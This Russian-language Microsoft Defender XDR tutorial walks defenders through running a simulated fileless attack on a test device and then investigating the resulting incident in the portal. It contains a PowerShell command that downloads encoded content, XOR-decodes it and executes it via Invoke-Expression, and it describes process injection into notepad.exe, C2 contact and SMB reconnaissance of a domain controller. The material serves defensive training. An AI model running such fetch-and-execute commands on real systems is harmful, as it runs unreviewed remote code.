Запуск имитации атаки в пилотной среде Microsoft Defender XDR

  • Статья

Эта статья является шагом 1 из 2 в процессе исследования инцидента и реагирования на инцидент в Microsoft Defender XDR с помощью пилотной среды. Дополнительные сведения об этом процессе см . в обзорной статье.

После подготовки пилотной среды пора протестировать реагирование Microsoft Defender XDR на инциденты и возможности автоматического исследования и исправления, создав инцидент с имитацией атаки и используя портал Microsoft Defender для исследования и реагирования.

Инцидент в Microsoft Defender XDR — это коллекция коррелированных оповещений и связанных данных, составляющих историю атаки.

Службы и приложения Microsoft 365 создают оповещения при обнаружении подозрительного или вредоносного события или действия. Отдельные оповещения предоставляют ценные подсказки о завершенной или продолжающейся атаке. Однако в атаках обычно используются различные методы против различных типов сущностей, например устройств, пользователей и почтовых ящиков. Это приводит к созданию нескольких оповещений для нескольких сущностей в клиенте.

Примечание.

Если вы не знакомы с анализом безопасности и реагированием на инциденты, см . пошаговое руководство по реагированию на первый инцидент , чтобы получить пошаговое руководство по типичному процессу анализа, исправления и проверки после инцидента.

Имитация атак с помощью портала Microsoft Defender

Портал Microsoft Defender имеет встроенные возможности для создания имитированных атак в пилотной среде:

Defender для Office 365 Обучение эмуляции атак

Defender для Office 365 с Microsoft 365 E5 или Microsoft Defender для Office 365 план 2 включает обучение симуляции атак для фишинговых атак. Ниже приведены основные шаги.

  1. Create имитации

    Пошаговые инструкции по созданию и запуску нового моделирования см. в разделе Имитация фишинговой атаки.

  2. Create полезные данные

    Пошаговые инструкции по созданию полезных данных для использования в имитации см. в разделе Create пользовательских полезных данных для обучения имитации атак.

  3. Получение аналитических сведений

    Пошаговые инструкции по сбору аналитических сведений с помощью отчетов см. в статье Получение аналитических сведений с помощью обучения симуляции атак.

Дополнительные сведения см. в разделе Моделирование.

Руководства по атакам в Defender для конечной точки & симуляции

Ниже приведены симуляции Defender для конечной точки от Корпорации Майкрософт:

  • Документ удаляет backdoor
  • Автоматическое исследование (backdoor)

Существуют дополнительные имитации из сторонних источников. Существует также набор учебников.

Для каждого моделирования или учебника:

  1. Скачайте и прочитайте соответствующий пошаговые инструкции.

  2. Скачайте файл имитации. Вы можете скачать файл или сценарий на тестовом устройстве, но это необязательно.

  3. Запустите файл моделирования или скрипт на тестовом устройстве, как описано в пошаговом документе.

Дополнительные сведения см. в разделе Опыт Microsoft Defender для конечной точки с помощью имитации атаки.

Имитация атаки с помощью изолированного контроллера домена и клиентского устройства (необязательно)

В этом необязательном упражнении по реагированию на инциденты вы имитируете атаку на изолированный контроллер домена доменные службы Active Directory (AD DS) и устройство Windows с помощью сценария PowerShell, а затем изучите, исправите и устраните инцидент.

Сначала необходимо добавить конечные точки в пилотную среду.

Добавление конечных точек пилотной среды

Сначала необходимо добавить изолированный контроллер домена AD DS и устройство Windows в пилотную среду.

  1. Убедитесь, что клиент пилотной среды включил Microsoft Defender XDR.

  2. Убедитесь, что контроллер домена:

  3. Убедитесь, что тестовое устройство:

Если вы используете группы клиентов и устройств, создайте выделенную группу устройств для тестового устройства и отправьте ее на верхний уровень.

Одной из альтернатив является размещение контроллера домена AD DS и тестового устройства в качестве виртуальных машин в службах инфраструктуры Microsoft Azure. Вы можете использовать инструкции из этапа 1 руководства по имитируемой корпоративной лаборатории тестирования, но пропустить создание виртуальной машины APP1.

Вот результат.

Среда оценки с помощью руководства по имитируемой корпоративной лаборатории тестирования

Вы имитируете сложную атаку, которая использует расширенные методы для скрытия от обнаружения. Атака перечисляет открытые сеансы SMB на контроллерах домена и извлекает последние IP-адреса устройств пользователей. Эта категория атак обычно не включает файлы, отброшенные на устройство жертвы, и они происходят исключительно в памяти. Они "живут вне земли", используя существующие системные и административные инструменты, и внедряют свой код в системные процессы, чтобы скрыть их выполнение. Такое поведение позволяет им уклоняться от обнаружения и сохраняться на устройстве.

В этом симуляции наш пример сценария начинается со сценария PowerShell. В реальном мире пользователь может быть обмануты в выполнении скрипта или скрипт может запуститься из удаленного подключения к другому компьютеру с ранее зараженного устройства, что указывает на то, что злоумышленник пытается переместиться в сеть в боковой части. Обнаружение этих скриптов может быть затруднено, так как администраторы также часто выполняют скрипты удаленно для выполнения различных административных действий.

Атака PowerShell без файлов с внедрением процесса и разведывательная атака SMB

Во время моделирования атака внедряет shellcode в, казалось бы, невинный процесс. Сценарий требует использования notepad.exe. Мы выбрали этот процесс для моделирования, но злоумышленники, скорее всего, будут ориентироваться на длительный системный процесс, например svchost.exe. Затем код оболочки переходит на связь с сервером команд и управления (C2) злоумышленника, чтобы получить инструкции о том, как действовать. Скрипт пытается выполнить разведывательные запросы к контроллеру домена (DC). Рекогносцировка позволяет злоумышленнику получить сведения о последних учетных данных пользователя. Когда злоумышленники получат эту информацию, они могут перемещаться в сети, чтобы перейти к определенной конфиденциальной учетной записи.

Важно!

Чтобы обеспечить оптимальные результаты, следуйте инструкциям по имитации атак как можно точнее.

Запуск имитации атаки изолированного контроллера домена AD DS

Чтобы запустить имитацию сценария атаки, выполните следующие действия.

  1. Убедитесь, что пилотная среда включает изолированный контроллер домена AD DS и устройство Windows.

  2. Войдите на тестовое устройство с помощью учетной записи тестового пользователя.

  3. Откройте окно Windows PowerShell на тестовом устройстве.

  4. Скопируйте следующий скрипт имитации:

    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
;$xor = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');
$base64String = (Invoke-WebRequest -URI "https://wcdstaticfilesprdeus.blob.core.windows.net/wcdstaticfiles/MTP_Fileless_Recon.txt" -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
$decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
$i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))

    Примечание.

    Если открыть эту статью в веб-браузере, могут возникнуть проблемы с копированием полного текста без потери определенных символов или создания дополнительных разрывов строк. Если это так, скачайте этот документ и откройте его на Adobe Reader.

  5. Вставьте и запустите скопированный скрипт в окне PowerShell.

Примечание.

Если вы используете PowerShell по протоколу удаленного рабочего стола (RDP), используйте команду Type Clipboard Text (Тип текста буфера обмена) в клиенте RDP, так как горячая клавиша CTRL-V или метод щелчка правой кнопкой мыши может не работать. В последних версиях PowerShell иногда этот метод также не принимается. Может потребоваться сначала скопировать его в Блокнот в памяти, скопировать его на виртуальной машине, а затем вставить в PowerShell.

Через несколько секунд откроется приложение Блокнот. Имитированный код атаки будет внедрен в Блокнот. Оставьте автоматически созданный экземпляр Блокнота открытым для полного сценария.

Имитированный код атаки попытается связаться с внешним IP-адресом (имитируя сервер C2), а затем попытается выполнить разведку контроллера домена через SMB.

По завершении этого сценария в консоли PowerShell отобразится следующее сообщение:

ran NetSessionEnum against [DC Name] with return code result 0

Чтобы увидеть в действии функцию автоматизированных инцидентов и реагирования, оставьте процесс notepad.exe открытым. Вы увидите, что автоматизированные инциденты и реагирование останавливают процесс Блокнота.

Исследование инцидента для имитации атаки

Примечание.

Прежде чем мы рассмотрим это моделирование, watch следующее видео, чтобы узнать, как управление инцидентами помогает объединить связанные оповещения в рамках процесса исследования, где их можно найти на портале и как это может помочь вам в операциях безопасности:

Переключившись на точку зрения аналитика SOC, вы можете начать расследование атаки на портале Microsoft Defender.

  1. Откройте портал Microsoft Defender.

  2. В области навигации выберите Инциденты & Инциденты оповещений>.

  3. Новый инцидент для имитации атаки появится в очереди инцидентов.

    Пример очереди инцидентов

Исследование атаки как одного инцидента

Microsoft Defender XDR сопоставляет аналитику и объединяет все связанные оповещения и исследования из разных продуктов в одну сущность инцидента. Таким образом, Microsoft Defender XDR показывает более широкую историю атак, позволяя аналитику SOC понимать сложные угрозы и реагировать на них.

Оповещения, созданные во время этого моделирования, связаны с одной и той же угрозой и, как следствие, автоматически агрегируются как один инцидент.

Чтобы просмотреть инцидент, выполните следующие действия:

  1. Откройте портал Microsoft Defender.

  2. В области навигации выберите Инциденты & Инциденты оповещений>.

  3. Выберите новый элемент, щелкнув круг, расположенный слева от имени инцидента. На боковой панели отображаются дополнительные сведения об инциденте, включая все связанные оповещения. Каждый инцидент имеет уникальное имя, описывающее его на основе атрибутов оповещений, которые он включает.

    Оповещения, отображаемые на панели мониторинга, можно фильтровать по ресурсам службы: Microsoft Defender для удостоверений, Microsoft Defender for Cloud Apps Microsoft Defender для конечной точки, Microsoft Defender XDR и Microsoft Defender для Office 365.

  4. Выберите Открыть страницу инцидента , чтобы получить дополнительные сведения об инциденте.

    На странице Инцидент можно просмотреть все оповещения и сведения, связанные с инцидентом. Сведения включают сущности и ресурсы, участвующие в оповещении, источник обнаружения оповещений (например, Microsoft Defender для удостоверений или Microsoft Defender для конечной точки), а также причину их связывания. Просмотр списка оповещений об инцидентах показывает ход атаки. В этом представлении можно просмотреть и исследовать отдельные оповещения.

    Вы также можете щелкнуть Управление инцидентом в меню справа, чтобы пометить инцидент, назначить его себе и добавить комментарии.

Просмотр созданных оповещений

Давайте рассмотрим некоторые оповещения, созданные во время имитации атаки.

Примечание.

Мы рассмотрим только несколько оповещений, созданных во время имитации атаки. В зависимости от версии Windows и продуктов Microsoft Defender XDR, работающих на тестовом устройстве, могут отображаться дополнительные оповещения, которые отображаются в немного другом порядке.

Пример созданного оповещения

Оповещение: обнаружена подозрительная внедрение процесса (источник: Microsoft Defender для конечной точки)

Продвинутые злоумышленники используют сложные и скрытые методы для сохранения в памяти и скрытия от средств обнаружения. Одним из распространенных способов является работа в доверенном системном процессе, а не в вредоносном исполняемом файле, что затрудняет обнаружение вредоносного кода средствами обнаружения и операциями безопасности.

Чтобы позволить аналитикам SOC перехватывать эти сложные атаки, датчики глубокой памяти в Microsoft Defender для конечной точки предоставить нашей облачной службе беспрецедентную видимость различных методов внедрения кода между процессами. На следующем рисунке показано, как Defender для конечной точки обнаружил и оповещал о попытке внедрения кода вnotepad.exe.

Пример оповещения о внедрении потенциально вредоносного кода

Предупреждение: непредвиденное поведение, наблюдаемое при выполнении процесса без аргументов командной строки (источник: Microsoft Defender для конечной точки)

Microsoft Defender для конечной точки обнаружения часто нацелены на наиболее распространенный атрибут метода атаки. Этот метод обеспечивает устойчивость и повышает планку перехода злоумышленников на более новую тактику.

Мы используем крупномасштабные алгоритмы обучения, чтобы установить нормальное поведение общих процессов в организации и во всем мире и watch, когда эти процессы демонстрируют аномальное поведение. Это аномальное поведение часто указывает на то, что был введен посторонний код и выполняется в процессе, который в противном случае является доверенным.

В этом сценарии процесс notepad.exe демонстрирует аномальное поведение, включающее обмен данными с внешним расположением. Этот результат не зависит от конкретного метода, используемого для внедрения и выполнения вредоносного кода.

Примечание.

Так как это оповещение основано на моделях машинного обучения, для которых требуется дополнительная серверная обработка, может потребоваться некоторое время, прежде чем вы увидите это оповещение на портале.

Обратите внимание, что сведения об оповещении включают внешний IP-адрес — индикатор, который можно использовать в качестве сводки для расширения исследования.

Выберите IP-адрес в дереве процесса оповещений, чтобы просмотреть страницу сведений об IP-адресе.

Пример непредвиденного поведения процесса, выполняемого без аргументов командной строки

На следующем рисунке показана страница сведений о выбранном IP-адресе (щелкнув IP-адрес в дереве оповещений).

Пример страницы сведений об IP-адресе

Оповещение: рекогносцировка пользователей и IP-адресов (SMB) (источник: Microsoft Defender для удостоверений)

Перечисление с помощью протокола SMB позволяет злоумышленникам получать последние сведения о входе пользователя, которые помогают им перемещаться по сети для доступа к определенной конфиденциальной учетной записи.

В этом обнаружении оповещение активируется при выполнении перечисления сеансов SMB в контроллере домена.

Пример оповещения Microsoft Defender для удостоверений для рекогносцировки пользователей и IP-адресов

Проверьте временная шкала устройства с помощью Microsoft Defender для конечной точки

После изучения различных оповещений в этом инциденте вернитесь на страницу инцидента, описанную ранее. Перейдите на вкладку Устройства на странице инцидента, чтобы просмотреть устройства, участвующие в этом инциденте, как сообщает Microsoft Defender для конечной точки и Microsoft Defender для удостоверений.

Выберите имя устройства, на котором была выполнена атака, чтобы открыть страницу сущности для этого конкретного устройства. На этой странице отображаются активированные оповещения и связанные события.

Перейдите на вкладку Временная шкала, чтобы открыть устройство временная шкала и просмотреть все события и поведение, наблюдаемые на устройстве в хронологическом порядке, вперемежая с поднятыми оповещениями.

Пример временная шкала устройства с поведением

Расширение некоторых из более интересных вариантов поведения предоставляет полезные сведения, такие как деревья процессов.

Например, прокрутите вниз, пока не обнаружите, что обнаружена подозрительная внедрение процесса. Выберите powershell.exe, внедренный в событие процесса notepad.exe под ним, чтобы отобразить полное дерево процесса для этого поведения в графе Сущности событий на боковой панели. При необходимости используйте строку поиска для фильтрации.

Пример дерева процессов для выбранного поведения создания файла PowerShell

Просмотрите сведения о пользователе с помощью Microsoft Defender for Cloud Apps

На странице инцидента выберите вкладку Пользователи , чтобы отобразить список пользователей, участвующих в атаке. Таблица содержит дополнительные сведения о каждом пользователе, включая оценку приоритета исследования каждого пользователя.

Выберите имя пользователя, чтобы открыть страницу профиля пользователя, где можно провести дальнейшее исследование. Ознакомьтесь с дополнительными сведениями об исследовании рискованных пользователей.

Страница пользователя Defender for Cloud Apps

Автоматическое исследование и защита

Примечание.

Прежде чем мы рассмотрим эту имитацию, watch следующее видео, чтобы узнать, что такое автоматическое самовосстановление, где найти его на портале и как он может помочь в операциях безопасности:

Вернитесь к инциденту на портале Microsoft Defender. На вкладке "Исследования" на странице "Инцидент" отображаются автоматизированные расследования, инициированные Microsoft Defender для удостоверений и Microsoft Defender для конечной точки. На снимке экрана ниже отображается только автоматическое исследование, запущенное Defender для конечной точки. По умолчанию Defender для конечной точки автоматически исправляет артефакты, найденные в очереди, что требует исправления.

Пример автоматизированных расследований, связанных с инцидентом

Выберите оповещение, которое активировало расследование, чтобы открыть страницу Сведения о расследовании . Вы увидите следующие сведения:

  • Оповещения, которые активировали автоматическое исследование.
  • Затронутые пользователи и устройства. Если индикаторы находятся на дополнительных устройствах, эти дополнительные устройства также будут перечислены.
  • Список доказательств. Найденные и проанализированные сущности, такие как файлы, процессы, службы, драйверы и сетевые адреса. Эти сущности анализируются на предмет возможных связей с оповещением и оцениваются как неопасные или вредоносные.
  • Обнаружены угрозы. Известные угрозы, обнаруженные в ходе исследования.

Примечание.

В зависимости от времени автоматическое исследование может по-прежнему выполняться. Подождите несколько минут, пока процесс завершится, прежде чем собирать и анализировать доказательства и просматривать результаты. Обновите страницу Сведения о расследовании , чтобы получить последние результаты.

Пример страницы сведений о расследовании

В ходе автоматического исследования Microsoft Defender для конечной точки определил процесс notepad.exe, который был внедрен как один из артефактов, требующих исправления. Defender для конечной точки автоматически останавливает внедрение подозрительного процесса в рамках автоматического исправления.

Вы увидите ,notepad.exe исчезают из списка запущенных процессов на тестовом устройстве.

Устранение инцидента

После завершения исследования и подтверждения его устранения вы устраните инцидент.

На странице Инцидент выберите Управление инцидентом. Задайте для параметра Состояние Разрешение инцидента и выберите True alert (True alert ) для классификации и Security testing (Проверка безопасности ) для определения.

Пример страницы инцидентов с открытой панелью

При устранении инцидента он разрешает все связанные оповещения на портале Microsoft Defender и связанных порталах.

Это содержит симуляцию атак для анализа инцидентов, автоматического исследования и разрешения инцидентов.

Следующее действие

Возможности реагирования на инциденты Microsoft Defender XDR

Шаг 2 из 2. Попробуйте Microsoft Defender XDR возможности реагирования на инциденты

Create среды оценки Microsoft Defender XDR

Совет

Хотите узнать больше? Engage с сообществом Microsoft Security в нашем техническом сообществе: Microsoft Defender XDR Техническое сообщество.